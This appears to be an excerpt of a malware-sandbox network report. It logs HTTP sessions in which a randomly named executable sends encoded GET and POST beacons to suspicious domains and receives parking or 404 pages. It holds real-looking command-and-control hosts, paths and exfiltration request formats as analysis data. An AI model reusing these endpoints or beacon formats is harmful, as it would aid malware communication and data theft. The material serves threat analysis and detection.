72 51 43 38 39 44 47 52 2b 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tlfZeKMjVPrFFOO2q5xqV5rURkceFjrxMZrfqG4P9KIDBHSdPP0/mDNNmuAPWeSMh8H/1Y+0CZPRrQC89DGR+g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 09:23:25.312644958 CET	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTQ0ZGNlYTItNDFjYS00NGI1LWExNmUtYjU0YmMwN2UyNzc5IiwicGFnZV90aW1lIjoxNzM2NTgzOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49997	199.59.243.228	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:27.424400091 CET	474	OUT	GET /8fw9/?jH4x=86JHl&3DkHhn=gtoYIMxc4wYwq9NPYFjSszTDPRf8MDoa911P7+bnEwIzn/+NgM97Q9dqk2PkQokDelqcKS+c9CYn/WPq5HMlXHH5MMUCc4tUxwGXuy1eGCrmBFPJkxXRRohM9/tBd2Opyg== HTTP/1.1 Host: www.dating-apps-az-dn5.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Jan 11, 2025 09:23:27.860451937 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 08:23:27 GMT content-type: text/html; charset=utf-8 content-length: 1514 x-request-id: 845bcacf-7999-4f3a-a991-e74066b3a8a3 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_d5+h7UnxP6X7K9EyCil2l78Bvb8xu69tLSoB+WYZmvwJ8vuQR9prxyJyHUPA4vVmByLHZjlPbT/XRs+jiiIsdw== set-cookie: parking_session=845bcacf-7999-4f3a-a991-e74066b3a8a3; expires=Sat, 11 Jan 2025 08:38:27 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 35 2b 68 37 55 6e 78 50 36 58 37 4b 39 45 79 43 69 6c 32 6c 37 38 42 76 62 38 78 75 36 39 74 4c 53 6f 42 2b 57 59 5a 6d 76 77 4a 38 76 75 51 52 39 70 72 78 79 4a 79 48 55 50 41 34 76 56 6d 42 79 4c 48 5a 6a 6c 50 62 54 2f 58 52 73 2b 6a 69 69 49 73 64 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_d5+h7UnxP6X7K9EyCil2l78Bvb8xu69tLSoB+WYZmvwJ8vuQR9prxyJyHUPA4vVmByLHZjlPbT/XRs+jiiIsdw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 09:23:27.860502958 CET	967	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODQ1YmNhY2YtNzk5OS00ZjNhLWE5OTEtZTc0MDY2YjNhOGEzIiwicGFnZV90aW1lIjoxNzM2NTgzOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49998	103.21.221.4	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:33.281068087 CET	751	OUT	POST /l03t/ HTTP/1.1 Host: www.tempatmudisini06.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.tempatmudisini06.click Referer: http://www.tempatmudisini06.click/l03t/ Connection: close Content-Length: 207 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 7a 2f 70 71 62 66 37 63 75 75 35 77 6a 67 55 79 4e 47 43 33 56 68 54 54 58 56 72 54 6f 78 59 6d 63 4e 70 6c 33 2f 4a 78 33 4c 4d 4e 6a 31 71 6f 39 6d 41 76 41 34 33 43 6a 63 4d 56 76 62 45 62 50 77 50 43 7a 38 30 51 78 62 69 62 6e 50 31 34 6e 63 4c 4a 61 49 41 6d 54 70 5a 67 6e 46 78 57 74 65 42 4f 61 78 50 58 33 6c 52 49 44 56 34 71 6e 46 46 6d 79 4b 5a 75 66 38 50 2f 56 6f 67 59 42 52 62 4f 38 67 51 52 4d 31 63 4b 46 76 56 65 64 66 4a 57 46 6d 64 4f 57 63 5a 66 78 61 68 33 6c 66 54 58 61 47 5a 57 42 53 75 6f 39 47 42 73 6a 49 4f 44 35 50 2b 64 39 7a 59 55 4d 37 36 71 62 49 4f 69 59 56 63 3d Data Ascii: 3DkHhn=z/pqbf7cuu5wjgUyNGC3VhTTXVrToxYmcNpl3/Jx3LMNj1qo9mAvA43CjcMVvbEbPwPCz80QxbibnP14ncLJaIAmTpZgnFxWteBOaxPX3lRIDV4qnFFmyKZuf8P/VogYBRbO8gQRM1cKFvVedfJWFmdOWcZfxah3lfTXaGZWBSuo9GBsjIOD5P+d9zYUM76qbIOiYVc=
Jan 11, 2025 09:23:34.190567017 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:23:34 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49999	103.21.221.4	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:35.821805000 CET	771	OUT	POST /l03t/ HTTP/1.1 Host: www.tempatmudisini06.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.tempatmudisini06.click Referer: http://www.tempatmudisini06.click/l03t/ Connection: close Content-Length: 227 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 7a 2f 70 71 62 66 37 63 75 75 35 77 69 41 45 79 4d 6e 43 33 51 42 54 53 59 31 72 54 68 52 59 69 63 4e 56 6c 33 2b 4e 68 33 2b 6b 4e 6a 51 75 6f 38 6b 34 76 42 34 33 43 72 38 4e 52 77 4c 45 51 50 77 7a 56 7a 34 30 51 78 61 47 62 6e 4f 46 34 6e 4c 6e 4f 63 59 41 65 47 35 5a 6d 70 6c 78 57 74 65 42 4f 61 33 6a 74 33 6c 5a 49 44 6d 77 71 31 33 68 70 75 36 5a 76 63 38 50 2f 47 34 67 45 42 52 61 68 38 6b 51 72 4d 32 6b 4b 46 75 6c 65 65 4f 4a 56 4c 57 64 4d 53 63 59 54 34 66 4d 75 72 4e 33 70 63 58 5a 32 4f 67 65 74 78 51 77 47 35 71 47 46 36 50 57 32 39 77 77 69 4a 4d 6e 43 42 72 65 53 47 43 4a 4c 38 75 69 6c 30 59 67 65 77 61 53 45 64 31 33 34 57 54 39 4a Data Ascii: 3DkHhn=z/pqbf7cuu5wiAEyMnC3QBTSY1rThRYicNVl3+Nh3+kNjQuo8k4vB43Cr8NRwLEQPwzVz40QxaGbnOF4nLnOcYAeG5ZmplxWteBOa3jt3lZIDmwq13hpu6Zvc8P/G4gEBRah8kQrM2kKFuleeOJVLWdMScYT4fMurN3pcXZ2OgetxQwG5qGF6PW29wwiJMnCBreSGCJL8uil0YgewaSEd134WT9J
Jan 11, 2025 09:23:36.703248978 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:23:36 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	50000	103.21.221.4	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:38.379188061 CET	1788	OUT	POST /l03t/ HTTP/1.1 Host: www.tempatmudisini06.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.tempatmudisini06.click Referer: http://www.tempatmudisini06.click/l03t/ Connection: close Content-Length: 1243 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 7a 2f 70 71 62 66 37 63 75 75 35 77 69 41 45 79 4d 6e 43 33 51 42 54 53 59 31 72 54 68 52 59 69 63 4e 56 6c 33 2b 4e 68 33 2b 38 4e 69 69 6d 6f 39 44 55 76 47 34 33 43 6c 63 4e 53 77 4c 45 4e 50 77 61 39 7a 34 34 6d 78 5a 75 62 68 6f 52 34 77 4a 66 4f 53 59 41 65 45 35 5a 6e 6e 46 77 55 74 65 52 4b 61 78 44 74 33 6c 5a 49 44 67 55 71 69 31 46 70 39 71 5a 75 66 38 50 7a 56 6f 67 34 42 56 2f 57 38 6b 64 57 4c 47 45 4b 47 4f 31 65 4e 4d 52 56 4a 32 64 43 56 63 5a 4f 34 66 49 4c 72 4d 62 6c 63 58 74 51 4f 6a 4f 74 7a 56 4a 68 6b 34 65 4b 6f 63 76 41 7a 53 67 55 47 2b 66 69 48 36 75 2f 62 43 4d 70 7a 37 4b 76 37 62 30 73 35 34 66 72 42 51 6a 4b 63 55 6b 4b 59 78 72 30 78 58 6a 75 34 6f 53 50 72 2f 38 2b 33 57 5a 57 77 66 36 70 50 52 41 33 64 72 33 55 61 6a 50 44 4e 70 78 4c 4b 62 59 45 7a 76 62 62 72 6b 6d 6b 64 37 4c 6d 42 67 32 47 76 35 75 4f 67 70 4e 6f 2f 2b 73 7a 55 75 72 42 47 6a 48 68 2b 5a 2b 55 39 78 4e 6a 5a 75 77 36 75 41 50 47 59 46 33 2f 6d 52 68 63 31 6c 6f 4b 4f 67 32 [TRUNCATED] Data Ascii: 3DkHhn=z/pqbf7cuu5wiAEyMnC3QBTSY1rThRYicNVl3+Nh3+8Niimo9DUvG43ClcNSwLENPwa9z44mxZubhoR4wJfOSYAeE5ZnnFwUteRKaxDt3lZIDgUqi1Fp9qZuf8PzVog4BV/W8kdWLGEKGO1eNMRVJ2dCVcZO4fILrMblcXtQOjOtzVJhk4eKocvAzSgUG+fiH6u/bCMpz7Kv7b0s54frBQjKcUkKYxr0xXju4oSPr/8+3WZWwf6pPRA3dr3UajPDNpxLKbYEzvbbrkmkd7LmBg2Gv5uOgpNo/+szUurBGjHh+Z+U9xNjZuw6uAPGYF3/mRhc1loKOg2xFK5CKvCLSvXdT3F0GK22ipsel3Ufok2B5lRWUH94YJMYXTONfJYby3JV9kKM0K7GTHIuYEN1lBGYq3PcJiGGX8q7s3mxIuu16rkIwykTTAlf/hPzjufl3h9XNkExsNpOfBXVgwGdCwRXkXKMLbUKUzdpzEFjUMOyXxw42Rb+SaT4LYS/+eA1CGy+Y47sBeWZHMWJryIsIdZs+DZE0OL6AnNFWvsZgk6xul+0qsjx0ksVogKzMjDNuBCtHV8VdHvyTTY4CQhoNd0KQrAabUDpFo4gSLd6ziEiBqzoLJ1REjVU5HOeEVgq7IwIMIfehEdYkv5War1lrArNVAzyVdBEbIi71Mn7H/WWE6xmK8lPnL1oQ3hGnPLMxgcLJYoF6gbyLuP7lOp1UweRpqHOgnfZL/Qgu9VPe6gUnMA3CbuK3fSlNgJOJ7Ll89t/saf/7tuajfwI4E9R3p3IKZA5q/ylcLXQGuZH8JyA/HciyFuRaXcLjQQA5NoJT/xV9/GL2EpIFsPMlRuJesevmpt6MsB891YS3Ahng66wOG0lN7z3W6lJXs36m1HLDFeTsgArUlGK9ywTHOlbxmTJ9N6ElQibRmy5mTwS2y2QBvvrsIwLcIwPD/q5BxHB1NzSbFGEK/cKscKVtI7SBDthXDZCez+fdWow9SQr7Jql7 [TRUNCATED]
Jan 11, 2025 09:23:39.267107964 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:23:39 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	50001	103.21.221.4	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:40.926628113 CET	474	OUT	GET /l03t/?3DkHhn=+9BKYrTO+vJXrUQOGHL0VAaKc2zJijozXdE03+pH7bI8lw2q1SksIpXkrtcR3646NgDj8ak0/OWJjttr6L+cUN80K7t0/Vsr8uZoIlGR8251DEoyq21C4q4re5ntRuh1QQ==&jH4x=86JHl HTTP/1.1 Host: www.tempatmudisini06.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Jan 11, 2025 09:23:41.827436924 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:23:41 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	50002	154.12.28.184	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:47.307190895 CET	730	OUT	POST /m36v/ HTTP/1.1 Host: www.7261ltajbc.bond Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.7261ltajbc.bond Referer: http://www.7261ltajbc.bond/m36v/ Connection: close Content-Length: 207 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 50 48 4d 67 64 42 72 31 50 2f 4f 33 74 51 39 34 57 73 51 48 70 38 75 70 76 36 53 48 4e 41 6c 5a 48 4f 53 57 74 73 77 69 56 58 36 55 34 37 54 73 55 4c 46 69 62 54 59 45 4d 41 6a 6d 61 5a 45 42 71 62 33 4b 45 4e 48 44 30 64 72 51 56 76 49 35 7a 4b 73 77 4e 2f 51 73 48 63 51 6a 71 67 41 45 41 6e 72 36 51 4c 41 4c 4b 5a 48 44 38 42 4e 78 61 56 34 62 35 63 33 50 54 50 37 36 64 49 59 41 57 77 49 4b 77 46 72 71 48 71 58 53 38 36 51 43 4e 43 70 6a 6e 38 6b 4e 68 38 48 4f 38 45 36 53 47 47 42 71 70 76 72 6b 39 44 2b 57 58 51 67 65 7a 51 79 6a 6e 53 35 57 48 35 37 6a 58 6a 77 4a 49 4f 72 78 67 39 49 3d Data Ascii: 3DkHhn=PHMgdBr1P/O3tQ94WsQHp8upv6SHNAlZHOSWtswiVX6U47TsULFibTYEMAjmaZEBqb3KENHD0drQVvI5zKswN/QsHcQjqgAEAnr6QLALKZHD8BNxaV4b5c3PTP76dIYAWwIKwFrqHqXS86QCNCpjn8kNh8HO8E6SGGBqpvrk9D+WXQgezQyjnS5WH57jXjwJIOrxg9I=
